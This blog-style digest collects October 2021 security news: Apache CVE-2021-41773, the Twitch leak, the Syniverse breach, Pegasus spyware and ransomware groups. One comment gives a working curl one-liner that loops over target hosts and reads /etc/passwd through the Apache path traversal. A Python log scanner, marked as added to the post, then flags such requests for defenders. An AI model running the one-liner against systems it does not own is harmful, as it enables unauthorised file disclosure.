This posting is here to collect cyber security news in October 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
Tomi Engdahl says:
Assessment of the investigation into the security of mobile devices https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/arvio-mobiililaitteiden-turvallisuuden-selvityksesta
The National Cyber Security Centre Finland at the Finnish Transport and Communications Agency Traficom has reviewed the report of the investigation carried out by Lithuania's national cyber security centre into mobile devices from three smartphone manufacturers.
The National Cyber Security Centre has found it to be largely accurate in its content. In the Centre's assessment, third-party app stores may have implications for cyber security.
Tomi Engdahl says:
Apache fixes zero-day vulnerability exploited in the wild, patch now https://www.bleepingcomputer.com/news/security/apache-fixes-zero-day-vulnerability-exploited-in-the-wild-patch-now/
The Apache Software Foundation has released version 2.4.50 of the HTTP Web Server to address two vulnerabilities, one of which is an actively exploited path traversal and file disclosure flaw. The actively exploited zero-day vulnerability is tracked as CVE-2021-41773 and it enables actors to map URLs to files outside the expected document root by launching a path traversal attack.
Tomi Engdahl says:
Android October patch fixes three critical bugs, 41 flaws in total https://www.bleepingcomputer.com/news/security/android-october-patch-fixes-three-critical-bugs-41-flaws-in-total/
Google has released the Android October security updates, addressing 41 vulnerabilities, all ranging between high and critical severity.
None of the 41 flaws addressed this month have been reported to be under active exploitation in the wild, so there should be no working exploits for them circulating out there.
Tomi Engdahl says:
AvosLocker ransomware gang to auction the data of victims who don’t pay https://therecord.media/avoslocker-ransomware-gang-to-auction-the-data-of-victims-who-dont-pay/
The operators of the AvosLocker ransomware gang have updated their website to create a system through which they plan to auction off the data of hacked companies that refuse to pay ransom demands.
Tomi Engdahl says:
Python ransomware script targets ESXi server for encryption https://news.sophos.com/en-us/2021/10/05/python-ransomware-script-targets-esxi-server-for-encryption/
A recently-concluded investigation into a ransomware attack revealed that the attackers executed a custom Python script on the target’s virtual machine hypervisor to encrypt all the virtual disks, taking the organization’s VMs offline. In what was one of the quickest attacks Sophos has investigated, from the time of the initial compromise until the deployment of the ransomware script, the attackers only spent just over three hours on the target’s network before encrypting the virtual disks in a VMware ESXi server.
Tomi Engdahl says:
Telegraph newspaper bares 10TB of subscriber data and server logs to world+dog
https://www.theregister.com/2021/10/05/telegraph_newspaper_10tb_data_breach/
The Telegraph newspaper managed to leak 10TB of subscriber data and server logs after leaving an Elasticsearch cluster unsecured for most of September, according to the researcher who found it online.
Tomi Engdahl says:
Data on as many as 1.5 billion Facebook users allegedly for sale on the dark web
https://www.tivi.fi/uutiset/tv/0169a572-011f-440c-839c-8c89267d6a00
Data on as many as 1.5 billion Facebook users is allegedly being sold on dark web hacker forums, Privacy Affairs writes. This is unrelated to the recent outage of Facebook's services and is merely an unfortunate coincidence for the company. The data being sold does not as such contain anything that a snooper could not access anyway; it is a compilation of information that Facebook users have left public.
The data apparently includes name, email address, location data, gender, phone number and username. Facebook users should think about what information they want to share about themselves on the service. Setting user information to private may be sensible in this respect.
Tomi Engdahl says:
F-Secure's Mikko Hyppönen: The concentration of online services in Silicon Valley is the internet's weak spot; Facebook's collapse was "quite exceptional"
https://yle.fi/uutiset/3-12128657
The six-hour outage of Facebook's services showed how vulnerable a position we are in. In the future the internet will be as important as the power grid, and that frightens even F-Secure's chief research officer Mikko Hyppönen.
Tomi Engdahl says:
The entirety of Twitch has reportedly been leaked
SOURCE CODES AND USER PAYOUTS AMONG THE DATA RELEASED IN A 128GB TORRENT
https://www.videogameschronicle.com/news/the-entirety-of-twitch-has-reportedly-been-leaked/
An anonymous hacker claims to have leaked the entirety of Twitch, including its source code and user payout information.
The user posted a 125GB torrent link to 4chan on Wednesday, stating that the leak was intended to “foster more disruption and competition in the online video streaming space” because “their community is a disgusting toxic cesspool”.
VGC can verify that the files mentioned on 4chan are publicly available to download as described by the anonymous hacker.
One anonymous company source told VGC that the leaked data is legitimate, including the source code for the Amazon-owned streaming platform.
If you have a Twitch account, it’s recommended that you also turn on two-factor authentication, which ensures that even if your password is compromised, you still need your phone to prove your identity using either SMS or an authenticator app.
Tomi Engdahl says:
Company that routes SMS for all major US carriers was hacked for five years
Syniverse and carriers haven’t revealed whether text messages were exposed.
https://arstechnica.com/information-technology/2021/10/company-that-routes-sms-for-all-major-us-carriers-was-hacked-for-five-years/
Syniverse, a company that routes hundreds of billions of text messages every year for hundreds of carriers including Verizon, T-Mobile, and AT&T, revealed to government regulators that a hacker gained unauthorized access to its databases for five years. Syniverse and carriers have not said whether the hacker had access to customers’ text messages.
A filing with the Securities and Exchange Commission last week said that “in May 2021, Syniverse became aware of unauthorized access to its operational and information technology systems by an unknown individual or organization. Promptly upon Syniverse’s detection of the unauthorized access, Syniverse launched an internal investigation, notified law enforcement, commenced remedial actions and engaged the services of specialized legal counsel and other incident response professionals.”
Syniverse said that its “investigation revealed that the unauthorized access began in May 2016″ and “that the individual or organization gained unauthorized access to databases within its network on several occasions, and that login information allowing access to or from its Electronic Data Transfer (‘EDT’) environment was compromised for approximately 235 of its customers.”
When contacted by Ars today, a Syniverse spokesperson provided a general statement that mostly repeats what’s in the SEC filing.
Syniverse declined to answer our specific questions about whether text messages were exposed and about the impact on the major US carriers.
“Given the confidential nature of our relationship with our customers and a pending law enforcement investigation, we do not anticipate further public statements regarding this matter,” Syniverse said.
The SEC filing is a preliminary proxy statement related to a pending merger with a special-purpose acquisition company that will make Syniverse a publicly traded firm.
Syniverse routes messages for 300 operators
Syniverse says its intercarrier messaging service processes over 740 billion messages each year for over 300 mobile operators worldwide. Though Syniverse likely isn’t a familiar name to most cell phone users, the company plays a key role in ensuring that text messages get to their destination.
“Syniverse has notified all affected customers of this unauthorized access where contractually required, and Syniverse has concluded that no additional action, including any customer notification, is required at this time,” the SEC filing said. Syniverse told us that it also “implemented substantial additional measures to provide increased protection to our systems and customers” in response to the incident but did not say what those measures are.
Syniverse’s SEC filing was submitted on September 27 and discussed yesterday in an article in Vice’s Motherboard section. According to Vice, a “former Syniverse employee who worked on the EDT systems” said those systems contain information on all types of call records. Vice also quoted an employee of a phone company who said that a hacker could have gained access to the contents of SMS text messages.
Tomi Engdahl says:
Accidental leak reveals US government has secretly hit Google with ‘keyword warrants’ to identify ANYONE searching certain names, addresses, and phone numbers
https://mol.im/a/10063665
https://www.dailymail.co.uk/news/article-10063665/Government-orders-Google-track-searching-certain-names-addresses-phone-numbers.html
Investigators are secretly using keyword warrants to help track down criminals
The relatively new style of warrant orders Google to track and provide user data on anyone who searches specific names, addresses or telephone numbers
Cybersecurity experts fear that keyword warrants set a precedent for breaching the fourth amendment protection against unreasonable searches
Google, however, has defended its decision to respond to the federal government’s keyword warrants and claims they protect users when doing so
Both the FBI and Department of Homeland Security have been cited as entities that have or may use keyword warrants
Tomi Engdahl says:
Princess Haya: Dubai ruler had ex-wife’s phone hacked – UK court
https://lm.facebook.com/l.php?u=https%3A%2F%2Fwww.bbc.co.uk%2Fnews%2Fworld-middle-east-58814978&h=AT0SXizT5JHDETRl77f0Rw7XSyrOJ1d2S3Om0Zf3DwEDVEIag3aY8SiNjq-L4tgjGexaiIc7IawoEbThzRUFk4P4txoIFwDI-Kjgg5Y0VWbR8hQliKDYYqgkJl3xsbRQPg
The High Court has found that the ruler of Dubai, Sheikh Mohammed Al Maktoum, interfered with British justice by ordering the hacking of the phone of his ex-wife, Princess Haya of Jordan.
The phones of her solicitors, Baroness Fiona Shackleton QC and Nick Manners, were also targeted during their divorce custody case, according to the court.
Princess Haya said the discovery had made her feel “hunted and haunted”.
Tomi Engdahl says:
Using My Python Skills To Punish Credit Card Scammers
https://m.youtube.com/watch?v=StmNWzHbQJU
Here we go again, another day, another scammer. This time a scammer decided to use a live payment processor to test validity of cards to scam. Not very smart and he’ll pay because of it.
Tomi Engdahl says:
Why Did Facebook Go Down? – Computerphile
https://www.youtube.com/watch?v=Bie32IZlMtY
Just what was it that took Facebook, Instagram & WhatsApp offline on 4th October 2021? – Dr Steve Bagley investigates!
Ironically, Facebook’s mission statement is best fulfilled when Facebook is disconnected from the Internet.
Many of today’s entrepreneurs live by Facebook founder Mark Zuckerberg’s now-famous motto: “Move fast and break things.”
The Era of “Move Fast and Break Things” Is Over
https://hbr.org/2019/01/the-era-of-move-fast-and-break-things-is-over
Tomi Engdahl says:
Actively exploited Apache 0-day also allows remote code execution https://www.bleepingcomputer.com/news/security/actively-exploited-apache-0-day-also-allows-remote-code-execution/
Proof-of-Concept (PoC) exploits for the Apache web server zero-day surfaced on the internet revealing that the vulnerability is far more critical than originally disclosed. These exploits show that the scope of the vulnerability transcends path traversal, allowing attackers remote code execution (RCE) abilities. Attackers can abuse Apache servers running version 2.4.49 not only to read arbitrary files but also to execute arbitrary code on the servers. Security researcher Hacker Fantastic noted that the flaw soon turns into a Remote Code Execution (RCE) vulnerability on a Linux system if the server is configured to support CGI via mod_cgi. CERT’s vulnerability analyst Will Dormann and security researcher Tim Brown have also reported success with code execution on Windows machines. “Again, Apache needs to be the vulnerable 2.4.49 version, and mod-cgi is enabled, and it needs to be missing the default Require all denied. But if both of those are true, then CVE-2021-41773 is as RCE as it gets,” explains Dormann.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/actively-exploited-apache-0-day-also-allows-remote-code-execution/
“Was CVE-2021-41773 mis-scoped when it was published?” surmised Dormann, pointing to the note in Apache’s original advisory that exploitation of the flaw would, at most, leak the source code of scripts—rather than running the scripts.
https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-41773
Tomi Engdahl says:
Apache test script from https://twitter.com/HackerGautam/status/1445412108863041544
cat targets.txt | while read host; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done
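A defender-side counterpart to the check above, added here and not part of the original post or any of the linked articles: it parses Apache access-log lines, percent-decodes the request path (repeatedly, so it also catches double-encoded variants such as %252e, which goes beyond the single-encoded form shown above) and flags requests whose decoded path climbs above the document root. The log lines, client addresses and function names are constructed for this example.

```python
"""Flag CVE-2021-41773-style path traversal attempts in Apache access logs."""
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def decode_path(raw: str, rounds: int = 3) -> str:
    """Percent-decode a request path, repeating until stable so that
    double-encoded dots (%252e -> %2e -> .) are also resolved."""
    decoded = raw
    for _ in range(rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def traversal_depth(decoded_path: str) -> int:
    """Walk the path segments and return the lowest directory depth reached
    relative to the document root. A negative value means the path escaped
    the root at some point (a traversal), even if later segments descend again."""
    depth = 0
    min_depth = 0
    for seg in decoded_path.split("?")[0].split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            min_depth = min(min_depth, depth)
        else:
            depth += 1
    return min_depth


def is_traversal_attempt(raw_path: str) -> bool:
    """True if the request path escapes the document root once decoded.
    The CVE-2021-41773 requests encode a dot as %2e, so a literal search for
    '..' in the raw path misses them; the decoded form is what matters."""
    return traversal_depth(decode_path(raw_path)) < 0


def scan_access_log(lines):
    """Return (client host, raw path, status) for every line that looks like
    a traversal attempt. Lines that do not parse are skipped, not flagged."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_traversal_attempt(m.group("path")):
            hits.append((m.group("host"), m.group("path"), int(m.group("status"))))
    return hits


# Constructed sample lines (documentation-range addresses), not from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1362',
    '198.51.100.7 - - [06/Oct/2021:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 5120',
    # '..' that stays inside the root is normal and must not be flagged.
    '198.51.100.7 - - [06/Oct/2021:10:00:04 +0000] "GET /docs/../images/logo.png HTTP/1.1" 200 874',
    # Double-encoded variant: a 404 still shows someone probing for the bug.
    '192.0.2.9 - - [06/Oct/2021:10:00:05 +0000] "GET /cgi-bin/.%252e/%252e%252e/etc/passwd HTTP/1.1" 404 196',
]

if __name__ == "__main__":
    for host, path, status in scan_access_log(SAMPLE_LOG):
        print(f"{host} {status} {path}")
```

A 200 status on a flagged line is the one to escalate: the server answered the request instead of rejecting it.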
Tomi Engdahl says:
Anonymous leaks Twitch source code and business data on 4chan https://therecord.media/anonymous-leaks-twitch-source-code-and-business-data-on-4chan/
Individuals claiming to be part of the Anonymous hacker collective have leaked the source code and business data of video streaming platform Twitch via a torrent file posted on the 4chan discussion board earlier today. The source of the leak is currently believed to be an internal Git server. Git servers are typically used by companies to allow large teams of programmers to make controlled and easily reversible changes to source code repositories. The leak was also labeled as “part one,” suggesting that more data will be leaked in the future. Although no user data was found in the leak, several security researchers have urged users to change their passwords and enable a multi-factor authentication solution for their account as a precaution.
Tomi Engdahl says:
Facebook CEO Mark Zuckerberg on putting profit before safety: ‘That’s just not true’
https://www.zdnet.com/article/facebook-ceo-mark-zuckerberg-on-putting-profit-before-safety-thats-just-not-true/
Facebook founder and CEO Mark Zuckerberg has publicly addressed claims that the social media giant prioritises profit over safety and wellbeing as “just not true”. “We care deeply about issues like safety, wellbeing, and mental health. It’s difficult to see coverage that misrepresents our work and our motives. At the most basic level, I think most of us just don’t recognize the false picture of the company that is being painted,” Zuckerberg wrote in a note to Facebook employees that he publicly posted on his Facebook page.
Tomi Engdahl says:
Singapore inks pact with Finland to mutually recognise IoT security labels https://www.zdnet.com/article/singapore-inks-pact-with-finland-to-mutually-recognise-iot-security-labels/
A year after it introduced a security labelling programme for consumer Internet of Things devices, Singapore has signed an agreement with Finland to recognise each nation’s respective cybersecurity labels, touting it as the first such pact. Touting it as the first of such bilateral recognition, Singapore says the partnership aims to reduce the need for duplicated testing.
Tomi Engdahl says:
Medtronic urgently recalls insulin pump controllers over hacking concerns https://www.bleepingcomputer.com/news/security/medtronic-urgently-recalls-insulin-pump-controllers-over-hacking-concerns/
Medtronic is urgently recalling remote controllers for insulin pumps belonging to the MiniMed Paradigm family of products, due to severe cybersecurity risks. The controllers that should be returned to the vendor are models MMT-500 and MMT-503, used with the Medtronic MiniMed 508 insulin pump and the MiniMed Paradigm family of insulin pumps. These devices were sold in the United States between August 1999 and July 2018, and it is estimated that there are 31,310 vulnerable units in use by diabetic patients in the country at the moment.
Tomi Engdahl says:
Fired IT admin revenge-hacks school by wiping data, changing passwords https://www.bleepingcomputer.com/news/security/fired-it-admin-revenge-hacks-school-by-wiping-data-changing-passwords/
A 29-year-old wiped data on systems of a secondary school in the U.K. and changed the passwords at an IT company, in retaliatory cyber attacks for being fired. As a result of his actions, the school’s systems could no longer be accessed and remote learning was impacted at a time when pupils were at home due to the Covid-19 pandemic.
Tomi Engdahl says:
ESET Discovers UEFI Bootkit in Cyber Espionage Campaign
https://www.securityweek.com/eset-discovers-uefi-bootkit-cyber-espionage-campaign
Threat hunters at ESET are training the spotlight on a previously undocumented UEFI bootkit capable of hijacking the EFI System Partition (ESP) to maintain persistence on infected Windows machines.
The ESET discovery is the second real-world UEFI bootkit to be publicly documented in recent weeks, following Kaspersky’s report on a new Windows UEFI bootloader fitted into the FinSpy surveillance spyware product.
According to ESET researchers Anton Cherepanov and Martin Smolar, the malware has evaded detection for almost a decade and was engineered to bypass Windows Driver Signature Enforcement to load its own unsigned driver.
“We traced the roots of this threat back to at least 2012, previously operating as a bootkit for systems with legacy BIOSes,” the research team said, noting that the upgrade to UEFI went unnoticed and undocumented for many years. “The days of UEFI (Unified Extensible Firmware Interface) living in the shadows of the legacy BIOS are gone for good.”
ESET named the threat “ESPecter” and warned it is capable of injecting code to set up command-and-control server connections.
Tomi Engdahl says:
Yubico Enables Biometric Logins With New YubiKey Bio Series
https://www.securityweek.com/yubico-enables-biometric-logins-new-yubikey-bio-series
Yubico this week announced the general availability of YubiKey Bio Series, its first security key to support biometric authentication on desktop computers.
Featuring support for the FIDO2/WebAuthn and U2F protocols, YubiKey Bio Series leverages fingerprint recognition to enable users to securely log in to their accounts using a second factor or without passwords at all.
The new security keys support the biometric enrollment and management features that have been implemented in modern platforms and operating systems.
According to Yubico, the devices have a three chip architecture and they store the biometric fingerprint material in a separate secure element, to ensure increased protection from physical attacks.
With the new YubiKey Bio, users can log in to desktop applications and services that support FIDO protocols, the company says. Microsoft 365 and Azure Active Directory, Citrix Workspace, GitHub, Duo, IBM Security Verify, as well as Okta and Ping Identity are supported out-of-the-box.
Tomi Engdahl says:
Microsec.ai Exits Stealth With Cloud Application Runtime Protection Platform
https://www.securityweek.com/microsecai-exits-stealth-cloud-application-runtime-protection-platform
Microsec.ai on Tuesday emerged from stealth mode to deliver a Cloud Native Application Protection Platform (CNAPP) solution designed to protect cloud-native applications at runtime.
The company’s agentless CNAPP solution aims to secure multi-cloud IaaS and PaaS environments, as well as containers and data, through a single, unified interface.
Founded in February 2021, the Santa Clara, California-based company offers support for major cloud infrastructure providers, including AWS, Azure, Google, IBM, and Oracle.
Microsec.ai claims to provide visibility into containers, microservices, network traffic, workloads, misconfigurations, and vulnerabilities, while also helping organizations remain compliant with policies and regulations and improve their overall security and governance.
“Business critical applications must be always-on and intellectual property must be continuously protected or the business suffers. Today, these valuable resources run in continuously changing IaaS environments that are under constant attack,” Mitthan Meena, Microsec co-founder and CEO, said.
Tomi Engdahl says:
Firefox 93 Improves Protection Against Tracking, Insecure Downloads
https://www.securityweek.com/firefox-93-improves-protection-against-tracking-insecure-downloads
Mozilla this week released Firefox 93 to the stable channel with several security improvements, including better privacy protections, patches, and anti-tracking capabilities.
Starting with Firefox 93, the browser blocks insecure HTTP downloads on encrypted (HTTPS) pages, to keep users safe from potentially unwanted or even malicious downloads.
Given that data transmitted over HTTP isn’t protected, attackers able to intercept that data could not only view it, but also tamper with it. Thus, attackers could potentially replace files downloaded over HTTP with malicious ones, which could lead to full system compromise.
Firefox 93 now blocks such insecure file downloads and prompts the user to stop the download and remove the file, while also offering the choice to continue with the download.
The browser now also blocks downloads in sandboxed iframes, to prevent instances where malicious content could initiate a drive-by download from the sandbox. Thus, unless the sandboxed content has the ‘allow-downloads’ attribute, Firefox will prevent such downloads.
After disabling older iterations of the Transport Layer Security (TLS) protocol last year, Firefox now closes the door on 3DES, a popular encryption algorithm that is nothing more than an adaptation of the Data Encryption Standard.
Tomi Engdahl says:
Over 100,000 Apache HTTP Servers Affected by Actively Exploited Zero-Day Flaw
https://www.securityweek.com/over-100000-apache-http-servers-affected-actively-exploited-zero-day-flaw
Users are urged to immediately patch an Apache HTTP Server zero-day vulnerability that has been exploited in the wild. More than 100,000 servers appear to be exposed to attacks.
Apache HTTP Server is a widely used, open-source HTTP server for Windows and UNIX operating systems. Its developers were informed on September 29 that version 2.4.49 is affected by a path traversal and file disclosure vulnerability.
Version 2.4.50, which should patch the flaw, was released just a few days later, and users are urged to update their installations as soon as possible.
The security hole, tracked as CVE-2021-41773, has been exploited in the wild, Apache HTTP Server developers warned in their advisory. Apache has not shared any information about the attacks, but they may have started before a patch was made available.
Tomi Engdahl says:
Twitch Blog:
Twitch says a server configuration change left data exposed on the internet and let a third party access its data — Out of an abundance of caution, we have reset all stream keys. You can get your new stream key here: https://dashboard.twitch.tv/settings/stream.
Updates on the Twitch Security Incident
https://blog.twitch.tv/en/2021/10/06/updates-on-the-twitch-security-incident/
Tomi Engdahl says:
Lorenzo Franceschi-Bicchierai / VICE:
As Twitch grapples with the giant data leak, a look at the impact on its streamers, who had extensive revenue and personal data leaked
The Twitch Hack Is Worse for Streamers Than for Twitch
https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch
The leak of source code and some internal security files does not expose sensitive data, according to a former Twitch employee.
Chris Scullion / Video Games Chronicle:
Twitch acknowledges a “breach” after a 4chan user leaks its source code, creator payouts from 2019-2021, proprietary SDKs, internal AWS services, and more
The entirety of Twitch has reportedly been leaked
https://www.videogameschronicle.com/news/the-entirety-of-twitch-has-reportedly-been-leaked/
Source codes and user payouts among the data released in a 128GB torrent
Tomi Engdahl says:
Haroon Siddique / The Guardian:
UK High Court rules that Dubai’s ruler, Sheikh Mohammed, used NSO Group’s Pegasus to hack the phone of his ex-wife and five associates — Sheikh Mohammed used spyware on Princess Haya and five associates in unlawful abuse of power, judge rules — The ruler of Dubai hacked the phone …
Dubai ruler hacked ex-wife using NSO Pegasus spyware, high court judge finds
https://www.theguardian.com/world/2021/oct/06/dubai-ruler-hacked-ex-wife-using-nso-pegasus-spyware-high-court-judge-finds-sheikh-mohammed-princess-haya
Sheikh Mohammed used spyware on Princess Haya and five associates in unlawful abuse of power, judge rules
Tomi Engdahl says:
https://www.dailymail.co.uk/news/article-10063665/Government-orders-Google-track-searching-certain-names-addresses-phone-numbers.html
Tomi Engdahl says:
US Navy ship Facebook page hijacked to stream video games https://blog.malwarebytes.com/hacking-2/2021/10/us-navy-ship-facebook-page-hijacked-to-stream-video-games/
The official Facebook page of the US Navy’s destroyer-class warship, USS Kidd, has been hijacked. According to Task & Purpose, who first reported on the incident, the account has done nothing but stream Age of Empires, an award-winning, history-based real-time strategy (RTS) video game wherein players get to grow civilizations by progressing them from one historical time frame to another. In an interview with Task & Purpose, Cmdr. Nicole Schwegman, a Navy spokesperson, confirmed the hijacking: “The official Facebook page for USS Kidd (DDG 100) was hacked. We are currently working with Facebook technical support to resolve the issue.”
Tomi Engdahl says:
FIN12 hits healthcare with quick and focused ransomware attacks https://www.bleepingcomputer.com/news/security/fin12-hits-healthcare-with-quick-and-focused-ransomware-attacks/
While most ransomware actors spend time on the victim network looking for important data to steal, one group favors quick malware deployment against sensitive, high-value targets. It can take less than two days for the FIN12 gang to execute on the target network a file-encrypting payload – most of the time Ryuk ransomware. Report:
https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets
Also:
https://www.zdnet.com/article/no-honor-among-thieves-one-in-five-targets-of-fin12-hacking-group-is-involved-in-healthcare/
Tomi Engdahl says:
16-31 August 2021 Cyber Attacks Timeline https://www.hackmageddon.com/2021/10/07/16-31-august-2021-cyber-attacks-timeline/
Here we go! The second timeline of August 2021 is out (first one here) covering the main cyber attacks that occurred in the second fortnight of the same month. And it looks like the end of Summer led to a decrease in the number of attacks with 78 events, corresponding to the minimum value of the last 12 months. Ransomware continues to dominate the threat landscape, but its percentage dropped to 24.4% (19 out of 78 events) in contrast with 39.6% of the previous fortnight.
Tomi Engdahl says:
Unpatched Dahua cams vulnerable to unauthenticated remote access https://www.bleepingcomputer.com/news/security/unpatched-dahua-cams-vulnerable-to-unauthenticated-remote-access/
Unpatched Dahua cameras are prone to two authentication bypass vulnerabilities, and a proof of concept exploit that came out today makes the case for upgrading pressing. The authentication bypass flaws are tracked as CVE-2021-33044 and CVE-2021-33045, and are both remotely exploitable during the login process by sending specially crafted data packets to the target device. For more details on how that works, you may check out the proof of concept (PoC) that was part of today’s full disclosure, which has been posted on GitHub.
Tomi Engdahl says:
Who Is Hunting For Your IPTV Set-Top Box?
https://isc.sans.edu/forums/diary/Who+Is+Hunting+For+Your+IPTV+SetTop+Box/27912/
Ever considered starting a company to create software for TV channel distribution over IP? It is big business with service providers “converging” their networks. Everything is better over IP. Why not TV?
Having TVs and set-top boxes with two-way IP connectivity allows you to collect all kinds of data from your users. Imagine you cannot only charge people for the content, but you can also sell their data to advertisers. You will know exactly what they watch and when. Are they flipping channels during commercials?
Tomi Engdahl says:
Code Execution Bug Affects Yamale Python Package Used by Over 200 Projects https://thehackernews.com/2021/10/code-execution-bug-affects-yamale.html
A high-severity code injection vulnerability has been disclosed in 23andMe’s Yamale, a schema and validator for YAML, that could be trivially exploited by adversaries to execute arbitrary Python code.
The flaw, tracked as CVE-2021-38305 (CVSS score: 7.8), involves manipulating the schema file provided as input to the tool to circumvent protections and achieve code execution. Particularly, the issue resides in the schema parsing function, which allows any input passed to be evaluated and executed, resulting in a scenario where a specially-crafted string within the schema can be abused for the injection of system commands.
Tomi Engdahl says:
Canopy Parental Control App Wide Open to Unpatched XSS Bugs https://threatpost.com/canopy-parental-control-app-unpatched-xss-bugs/175384/
The possible cyberattacks include disabling monitoring, location-tracking of children and malicious redirects of parent-console users. Canopy, a parental control app that offers a range of features meant to protect kids online via content inspection, is vulnerable to a variety of cross-site scripting (XSS) attacks, according to researchers.
Tomi Engdahl says:
Cybercriminals threaten to hack EU hospitals in latest COVID-19 vaccine scam https://www.zdnet.com/article/cybercriminals-threaten-to-hack-eu-hospitals-in-latest-covid-19-vaccine-scam/
Cybersecurity experts have uncovered a new COVID-19 vaccination scam involving hackers tricking victims into providing their personal information under the assumption that cybercriminals can hack into European Union hospitals and falsify vaccination record. DarkOwl, the cybersecurity firm that uncovered the scam, notes that the EU Digital COVID Certificate program and most EU hospitals have stringent cybersecurity measures in place to protect user data.
Tomi Engdahl says:
Twitch confirmed a major data breach: this is how you protect your account https://www.is.fi/digitoday/esports/art-2000008315753.html
Amazon-owned streaming service Twitch has confirmed that the data breach reported on Wednesday is genuine. Twitch's short statement said the company is investigating the extent and impact of the breach. According to the statement, there are currently no indications that user data or credit card details have fallen into the wrong hands.
Also:
https://www.iltalehti.fi/tietoturva/a/27363ee3-130e-486b-b699-f1707227032f
https://www.tivi.fi/uutiset/tv/261ba40d-6ca9-4e80-b283-443e43085b5f
Tomi Engdahl says:
NSO Group’s Pegasus malware was used to spy on Dubai princess’s lawyers during child custody dispute https://www.theregister.com/2021/10/07/pegasus_malware_princess_haya/
Cherie Blair tipped off a Jordanian princess that the royal’s estranged husband, the Sheikh of Dubai, had deployed NSO Group’s Pegasus malware against her and her lawyers, a series of explosive High Court judgments [PDFs] have revealed. Set against a backdrop of kidnappings, espionage and a bitterly contested child custody case, the judgments shine fresh light on the abusive uses to which NSO Group’s malware products are put by some of its customers.
Tomi Engdahl says:
Transdev denies data stolen by ransomware group, connects leak to September attack on client https://www.zdnet.com/article/transdev-denies-data-stolen-by-ransomware-group/
French transportation giant Transdev has denied that any of its information was stolen by a ransomware group after cybercriminals claimed to have 200GB of data and threatened to leak it on Sunday, October 10. The LockBit ransomware group listed Transdev on its leak site next to a timer set to expire at 1:00 on Sunday. But Transdev — which calls itself the “largest private provider of multiple modes of transport in North America” — said the data being hawked by LockBit was from one of their clients.
Tomi Engdahl says:
Aggressive Ransomware Group FIN12 Moves Fast, Targets Big Companies
https://www.securityweek.com/aggressive-ransomware-group-fin12-moves-fast-targets-big-companies
A report published by Mandiant on Thursday details the activities and tools of FIN12, a highly aggressive ransomware group that has likely made a significant amount of money over the past years.
The threat group, tracked until now by Mandiant as UNC1878, has been around since at least October 2018. The UNC classification is assigned to “uncategorized” entities before the cybersecurity firm can determine with certainty if it’s a financially-motivated group (FIN) or a state-sponsored advanced persistent threat actor (APT).
Tomi Engdahl says:
Iran-linked MalKamak Hackers Targeting Aerospace, Telcos With ShellClient RAT
https://www.securityweek.com/iran-linked-malkamak-hackers-targeting-aerospace-telcos-shellclient-rat
Tomi Engdahl says:
Cisco Patches High-Severity Vulnerabilities in Security Appliances, Business Switches
https://www.securityweek.com/cisco-patches-high-severity-vulnerabilities-security-appliances-business-switches
Cisco this week released patches for multiple high-severity vulnerabilities affecting its Web Security Appliance (WSA), Intersight Virtual Appliance, Small Business 220 switches, and other products.
Successful exploitation of these vulnerabilities could allow attackers to cause a denial of service (DoS) condition, execute arbitrary commands as root, or elevate privileges.
Two high-severity issues (CVE-2021-34779, CVE-2021-34780) were found in the Link Layer Discovery Protocol (LLDP) implementation for Small Business 220 series smart switches, leading to the execution of arbitrary code and a denial of service condition.
The software update released for the enterprise switch series also resolves four medium-severity security flaws that could result in LLDP memory corruption on an affected device.
Another severe vulnerability is an insufficient input validation in the Intersight Virtual Appliance. Tracked as CVE-2021-34748, the security hole could lead to the execution of arbitrary commands with root privileges.
This week Cisco also resolved two high-severity vulnerabilities in the ATA 190 series and ATA 190 series multiplatform (MPP) software. Tracked as CVE-2021-34710 and CVE-2021-34735, the flaws could be exploited for remote code execution and to cause a denial of service (DoS) condition, respectively.
Tomi Engdahl says:
I rest my case … no further proof needed:
Don’t ask me why … think … for the big picture.
Verizon, AT&T and T-Mobile have outages at same time Facebook, Instagram, WhatsApp down
https://lm.facebook.com/l.php?u=https%3A%2F%2Fmetro.co.uk%2F2021%2F10%2F04%2Fverizon-att-t-mobile-outages-as-facebook-instagram-whatsapp-down-15363402%2F&h=AT0bjvhbUmO4irzI98ckEAnHN4Vhh_Kxl6sYtiZPLyec5FpE7JoXaubm-jav5lh7fzBQc3m_UiLtN68SZfVBjJce86EmiOvGRWdsSdKiEGG6wmQv8TrPgXoq-PPt56AogA
Major cellular phone providers AT&T, Verizon and T-Mobile reportedly experienced outages around the same time that Facebook, Instagram and WhatsApp were down.
Tens of thousands of cell phone users were left with service issues worldwide when the outages started around 11.30am ET on Monday, the Daily Mail reported.
Customers said they could not connect to the internet using cellular data, but were able to using WiFi. They were still able to make phone calls and send text messages.
Speculation circulated that the cellular outages were linked, but none of the three major providers have confirmed.
The cellular outages occurred just before Facebook, Instagram, WhatsApp and Facebook Messenger crashed worldwide around 11.44am ET, according to DownDetector. The disruption to the social media platforms has continued for two hours and counting.
The more than two hour outage has already cost the global economy $160million, according to NetBlocks, which tracks internet outages.
Tomi Engdahl says:
Car Thieves Caught Using $27,000 Hacking Device Disguised as a Game Boy
https://www.autoevolution.com/news/car-thieves-caught-using-27000-hacking-device-disguised-as-a-game-boy-171076.html?utm_source=fark&utm_medium=website&utm_content=link&ICID=ref_fark
